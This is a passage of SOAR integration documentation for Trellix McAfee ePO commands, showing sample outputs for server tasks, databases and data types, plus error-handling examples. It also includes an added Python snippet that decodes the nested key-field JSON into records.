    "description": "\"[\\r\\n \\r\\n  \\\"This default task updates the master repository from the McAfee update site (McAfeeHttp).\\\",\\r\\n \\r\\n  \\\"TIE Server telemetry process to collect and transmit data from remote points.\\\",\\r\\n \\r\\n  \\\"It manages the synchronization of the TIE Server Topology in a multi-ePO environment.\\\",\\r\\n \\r\\n  \\\"It manages the synchronization of the TIE Server CAs in a multi-ePO environment.\\\",\\r\\n \\r\\n  \\\"TIE Server monitoring mechanism to save events.\\\",\\r\\n \\r\\n  \\\"TIE Server Database Maintenance trigger.\\\",\\r\\n \\r\\n  \\\"TIE Server Data Management cleanup trigger.\\\",\\r\\n \\r\\n  \\\"Synchronize client tasks among designated registered servers.\\\",\\r\\n \\r\\n  \\\"Synchronize policies among designated registered servers.\\\",\\r\\n \\r\\n  \\\"Send the current DXL State event to the DXL Fabric\\\",\\r\\n \\r\\n  \\\"Sends the full list of certificates revoked by the administrator. This task should be run after every new broker deployment.\\\",\\r\\n \\r\\n  \\\"This default task creates roll-up data for this ePO server for inclusion in multi-server reporting.\\\",\\r\\n \\r\\n  \\\"Delete Threat and Client event records older than 90 days.\\\",\\r\\n \\r\\n  \\\"Purges obsolete Appliance Management data from the McAfee ePO database.\\\",\\r\\n \\r\\n  \\\"Migrate data from old database tables to new database tables. 
As this activity will consume high database system resources, McAfee recommends administrator to run this task during low Agent-Server communication time (preferably over weekends).\\\",\\r\\n \\r\\n  \\\"Evaluate each system against the DXLBROKER tag criteria and update DXL Broker Policies\\\",\\r\\n \\r\\n  \\\"Refresh required Tags on Active Response servers\\\",\\r\\n \\r\\n  \\\"Syncs users from an LDAP server to the database\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"This default task stores the results of the 'McAfee Agent Compliance Summary' query for use in reporting on compliance history.\\\",\\r\\n \\r\\n  \\\"ePO Database Index Maintenance and statistics update\\\",\\r\\n \\r\\n  \\\"Process properties received from client and convert them into rules.\\\",\\r\\n \\r\\n  \\\"Delete systems whose sequence error count has exceeded the threshold and add Agent GUID to duplicate list.\\\",\\r\\n \\r\\n  \\\"Clear Sequence Error Count for systems who have not recently reported duplicate activities.\\\",\\r\\n \\r\\n  \\\"Downloads the list of software your license key has access to.\\\",\\r\\n \\r\\n  \\\"Runs the set reviewer task\\\",\\r\\n \\r\\n  \\\"Runs the send email task (before each run it will execute: set reviewer task)\\\",\\r\\n \\r\\n  \\\"Deletes events and incidents from the LIVE database tables. Evidence files are not deleted since they associated with the event or incidents in the HISTORY lists.\\\",\\r\\n \\r\\n  \\\"Deletes events and incidents from the HISTORY database tables and mark evidence files for deletion. If the event or incident are still in the LIVE incidents and operational events list tables this task will delete them from the LIVE tables.\\\",\\r\\n \\r\\n  \\\"Delete evidence files that were marked for deletion. 
Recommended to run on weekly basis.\\\",\\r\\n \\r\\n  \\\"DLP policy conversion from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"This task migrates operational events from old 9.3.x schema to 9.4.100 schema and above\\\",\\r\\n \\r\\n  \\\"This task migrates incident events from 9.3 schema to the latest DLP database schema.\\\\nThis task must be run as long as you have McAfee DLP Endpoint 9.3.x agent. Version 9.3.x reports incidents into a legacy DLP database schema.\\\",\\r\\n \\r\\n  \\\"DLP Import MVision Cloud Events\\\",\\r\\n \\r\\n  \\\"This task converts operational events and incidents from 9.4 and above to the latest schema. Run this task once after upgrading from 9.4 and above\\\",\\r\\n \\r\\n  \\\"DLP delete unassociated evidence files\\\",\\r\\n \\r\\n  \\\"Deletes DLP system information and user session information for systems that were removed from ePO system tree\\\",\\r\\n \\r\\n  \\\"Built-in Disaster Recovery Snapshot Server Task (disabled by default for Microsoft SQL Server Express)\\\",\\r\\n \\r\\n  \\\"Detects newly installed discovery servers and enabled them to run discovery scans\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Endpoint Reports\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Dashboard data\\\",\\r\\n \\r\\n  \\\"Runs every 30 minutes and gathers threats for workloads from Point products ENS, ENSL or Solidcore.\\\",\\r\\n \\r\\n  \\\"Deletes seven days old threat events data from CWS_THREATEVENTS_LIST table once every 24 hours.\\\",\\r\\n \\r\\n  \\\"Evaluate each system against the TIESERVER tag criteria and tag the appropriate systems.\\\",\\r\\n \\r\\n  \\\"Synchronizes data between the Active Response Workspace and the cloud platform.\\\"\\r\\n \\r\\n ]\"",
    "enabled": "\"[\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\"",
    "endDate": "\"[\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\"\\r\\n \\r\\n ]\"",
    "id": "\"[\\r\\n \\r\\n  *****,\\r\\n \\r\\n  ***** ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"Update Master Repository\\\",\\r\\n \\r\\n  \\\"TIE Server Telemetry\\\",\\r\\n \\r\\n  \\\"TIE Server Synchronize Topology\\\",\\r\\n \\r\\n  \\\"TIE Server Synchronize CA\\\",\\r\\n \\r\\n  \\\"TIE Server Monitoring\\\",\\r\\n \\r\\n  \\\"TIE Server Database Maintenance\\\",\\r\\n \\r\\n  \\\"TIE Server Data Management\\\",\\r\\n \\r\\n  \\\"Synchronize Shared Tasks\\\",\\r\\n \\r\\n  \\\"Synchronize Shared Policies\\\",\\r\\n \\r\\n  \\\"Send DXL State Event\\\",\\r\\n \\r\\n  \\\"Send DXL Certificate Revocations\\\",\\r\\n \\r\\n  \\\"Roll Up Data (Local ePO Server)\\\",\\r\\n \\r\\n  \\\"Purge Threat and Client Events Older than 90 Days\\\",\\r\\n \\r\\n  \\\"Purge Obsolete Appliance Management Data\\\",\\r\\n \\r\\n  \\\"Migrate Data to New Tables\\\",\\r\\n \\r\\n  \\\"Manage DXL Brokers\\\",\\r\\n \\r\\n  \\\"Manage Active Response Servers\\\",\\r\\n \\r\\n  \\\"LdapSync: Sync across users from LDAP\\\",\\r\\n \\r\\n  \\\"Inactive Agent Cleanup Task\\\",\\r\\n \\r\\n  \\\"Generate Records for McAfee Agent Compliance History Reporting\\\",\\r\\n \\r\\n  \\\"ePO Database Index Maintenance\\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall Property Translator\\\",\\r\\n \\r\\n  \\\"Duplicate Agent GUID - remove systems with potentially duplicated GUIDs\\\",\\r\\n \\r\\n  \\\"Duplicate Agent GUID - clear error count\\\",\\r\\n \\r\\n  \\\"Download Software Product List\\\",\\r\\n \\r\\n  \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP Purge Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP Purge History of Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP purge evidences\\\",\\r\\n \\r\\n  \\\"DLP Policy Conversion from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"DLP operational events migration from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"DLP incident migration from 9.3.x to 
9.4.100 and above\\\",\\r\\n \\r\\n  \\\"DLP Import MVision Cloud Events\\\",\\r\\n \\r\\n  \\\"DLP events conversion 9.4 and above\\\",\\r\\n \\r\\n  \\\"DLP delete unassociated evidence files\\\",\\r\\n \\r\\n  \\\"DLP delete systems that were removed from ePO system tree\\\",\\r\\n \\r\\n  \\\"Disaster Recovery Snapshot Server\\\",\\r\\n \\r\\n  \\\"Detect Discovery Servers\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Endpoint Reports\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Dashboard data\\\",\\r\\n \\r\\n  \\\"CWS threat events sync task\\\",\\r\\n \\r\\n  \\\"CWS threat events deleter\\\",\\r\\n \\r\\n  \\\"Apply TIESERVER Tags to TIE Servers\\\",\\r\\n \\r\\n  \\\"Active Response Workspace synchronization\\\"\\r\\n \\r\\n ]\"",
    "nextRunTime": "\"[\\r\\n \\r\\n  \\\"2019-12-24T01:41:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-29T02:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:30:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:10:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:30:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-29T01:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-29T04:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T01:42:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T22:30:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-27T23:30:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-28T04:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-23T22:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-27T04:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T01:59:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T23:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:00:00-08:00\\\"\\r\\n \\r\\n ]\"",
    "startDate": "\"[\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-31T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-31T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-10T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-31T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-10-22T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2012-01-01T00:00:01-08:00\\\",\\r\\n \\r\\n  
\\\"2012-01-01T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-06-28T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-06-28T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\"\\r\\n \\r\\n ]\"",
    "valid": "\"[\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML-formatted table.

SAMPLE DATA

| id | name | description | startDate | endDate | nextRunTime | enabled | valid |
|---|---|---|---|---|---|---|---|
| *** | Update Master Repository | This default task updates the master repository from the McAfee update site (McAfeeHttp). | 2/14/2018 12:00:01 AM | None | 1/7/2020 1:41:00 AM | True | True |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List All Server Task failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List All Server Task failed.

Status Code: 401.

Message: Unauthorized.

List Database

Retrieves a list of all databases.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "name": "ePO",
        "databaseType": ""
    },
    {
        "name": "TIE Server 1.1.1.1",
        "databaseType": "TieServerSchema"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "name": "ePO",
        "databaseType": ""
    },
    {
        "name": "TIE Server 1.1.1.1",
        "databaseType": "TieServerSchema"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"name\\\": \\\"ePO\\\",\\r\\n        \\\"databaseType\\\": \\\"\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"name\\\": \\\"TIE Server 1.1.1.1\\\",\\r\\n        \\\"databaseType\\\": \\\"TieServerSchema\\\"\\r\\n    }\\r\\n]\"",
    "databaseType": "\"[\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"TieServerSchema\\\"\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"ePO\\\",\\r\\n \\r\\n  \\\"TIE Server 1.1.1.1\\\"\\r\\n \\r\\n ]\""
}
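
Key Fields values are not plain arrays: as the sample above shows, each value is a JSON string that itself encodes the array text, and each key holds one column rather than one record. The following added example (not part of the D3 documentation; the function names and the `max_layers` bound are assumptions, and the embedded input is constructed from the List Database sample on this page) decodes those values and rebuilds per-record rows, rejecting misaligned columns before they reach a playbook task input.

```python
import json

# Constructed input: the "name" and "databaseType" Key Fields from the
# List Database sample on this page, copied with their escaping intact.
SAMPLE_KEY_FIELDS = r'''{
    "databaseType": "\"[\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"TieServerSchema\\\"\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"ePO\\\",\\r\\n \\r\\n  \\\"TIE Server 1.1.1.1\\\"\\r\\n \\r\\n ]\""
}'''

# The server-task sample on this page uses the text "None" for empty dates.
NULL_TEXT = "None"


def unwrap(value, max_layers=4):
    """Peel JSON string layers until the value is no longer encoded text.

    max_layers is an assumed safety bound, not a documented D3 limit.
    """
    layers = 0
    while isinstance(value, str) and value.lstrip()[:1] in ('"', "[", "{"):
        if layers == max_layers:
            raise ValueError("more encoding layers than expected")
        value = json.loads(value)  # JSONDecodeError (a ValueError) if malformed
        layers += 1
    return value


def decode_column(raw):
    """Decode one Key Fields value into a Python list, mapping "None" to None."""
    decoded = unwrap(raw)
    if not isinstance(decoded, list):
        raise ValueError(f"expected an array, got {type(decoded).__name__}")
    return [None if item == NULL_TEXT else item for item in decoded]


def key_fields_to_rows(key_fields_json, skip=("Output",)):
    """Rebuild one dict per record from the column arrays in Key Fields.

    "Output" is skipped because it holds the whole response, not a column.
    """
    fields = json.loads(key_fields_json)
    columns = {k: decode_column(v) for k, v in fields.items() if k not in skip}
    lengths = {k: len(v) for k, v in columns.items()}
    if len(set(lengths.values())) > 1:
        # Misaligned columns would pair a value with the wrong record.
        raise ValueError(f"column lengths differ: {lengths}")
    count = next(iter(lengths.values()), 0)
    return [{k: columns[k][i] for k in columns} for i in range(count)]


if __name__ == "__main__":
    for row in key_fields_to_rows(SAMPLE_KEY_FIELDS):
        print(row)
```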
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML-formatted table.

SAMPLE DATA

| name | databaseType |
|---|---|
| ePO | |
| TIE Server 1.1.1.1 | TieServerSchema |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Database failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List Database failed.

Status Code: 401.

Message: Unauthorized.

List Data Type

Retrieves all data types.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "type": "udlp_redacted_text",
        "operations": [
            {
                "name": "udlp_eq_redaction_op",
                "description": "udlp_eq_redaction_op"
            },
            {
                "name": "not_isBlank",
                "description": "Value is not blank"
            }
        ]
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "type": "udlp_redacted_text",
        "operations": [
            {
                "name": "udlp_eq_redaction_op",
                "description": "udlp_eq_redaction_op"
            },
            {
                "name": "not_isBlank",
                "description": "Value is not blank"
            }
        ]
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\r\\n\\t\\t\\\"type\\\": \\\"udlp_redacted_text\\\",\\r\\n\\t\\t\\\"operations\\\": [\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_eq_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_eq_redaction_op\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"not_isBlank\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"Value is not blank\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_not_contains_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_not_contains_redaction_op\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"isBlank\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"Value is blank\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_contains_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_contains_redaction_op\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_ne_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_ne_redaction_op\\\"\\r\\n\\t\\t\\t}\\r\\n\\t\\t]\\r\\n\\t}]\"",
    "operations": "\"[\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_not_contains_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_not_contains_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_contains_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_contains_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"childOf\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"childOf\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"descendsFrom\\\",\\r\\n 